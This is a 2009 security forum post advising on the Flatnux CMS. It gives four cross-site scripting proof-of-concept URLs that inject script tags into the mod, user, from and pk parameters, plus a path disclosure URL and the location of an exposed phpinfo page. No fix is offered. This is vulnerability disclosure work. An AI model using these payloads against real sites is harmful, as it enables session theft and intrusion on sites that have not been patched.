InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (1) Thread Tools Display Modes
  1 links from elsewhere to this Post. Click to view. #1  
Old 3rd June 2009, 23:37
MaXe's Avatar
Studying shellcode..
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 3,405
Blog Entries: 36
Rep Power: 10
Reputation: 198
MaXe has made his way up the systemMaXe has made his way up the system
Flatnux 2009-03-27 - XSS Vulnerabilities + More
Flatnux - Cross Site Scripting Vulnerabilities + More

Version Affected: "2009-03-27" (newest)

Info: See website for more information.

Credits: InterN0T

External Links:
http://www.flatnux.altervista.org/


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
mod, user, from, pk & dir (some has to be used in conjunction with other function calls)

Cross Site Scripting:
1. http://www.website.tld/flatnux/index.php?mod="><script>alert(0)</script> (anyone)
2. http://www.website.tld/flatnux/index.php?mod=login&op=profile&user="><script>aler t(0)</script> (registered users only)
3. http://www.website.tld/flatnux/index.php?opindex=modcont&file=misc/motd.en.php&from="><script>alert(0)</script> (admin only)
4. http://www.website.tld/flatnux/controlcenter.php?mod=controlcenter&op=03_users/20_groups&opmod=insnew_groups&pk="><script>alert(0 )</script> (admin only)

Path Disclosure:
http://www.website.tld/flatnux/index.php?mod=05_Foto&dir='

Information Disclosure:
http://www.website.tld/flatnux/sections/none_Control_Center/phpinfo.php
-:: Solution ::-
I didn't bother to find one, sorry.

Disclosure Information:
- Vulnerabilities found and confirmed between 1st and 3rd June 2009.
- Published at InterN0T the 3rd June 2009.
- Bugtraq contacted the 3rd June 2009.


All of the best,
MaXe
__________________

Quote:
Originally Posted by Norph
MaXe, I really doubt that you are able to browse ANY site more than 2 minutes before you start pwning it xD
Reply With Quote
Reply

Bookmarks

« Geeklog 1.5 - Pre-Installation Vulnerabilities | Pivot 1.40.4-7 - Multiple Vulnerabilities »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1084-flatnux-2009-03-27-cross-site-scripting-vulnerabilities-more.html
Posted By For Type Date
FlatnuX CMS Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 10th June 2009 15:18

Similar Threads
Thread Thread Starter Forum Replies Last Post
Shmoocon 2009 Videos! MaXe General Hacking Discussions 5 15th September 2009 04:47
[News] InterN0T 2009 - February MaXe InterN0T Newz 0 13th February 2009 14:39
[Win32] Agnitum Suite Pro 2009 macd3v Defensive Software & Anonymity 0 24th December 2008 05:09
Vulnerabilities Analysis Drathnar Security Tutorials and Guides 0 13th August 2008 20:12


All times are GMT +2. The time now is 13:57.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.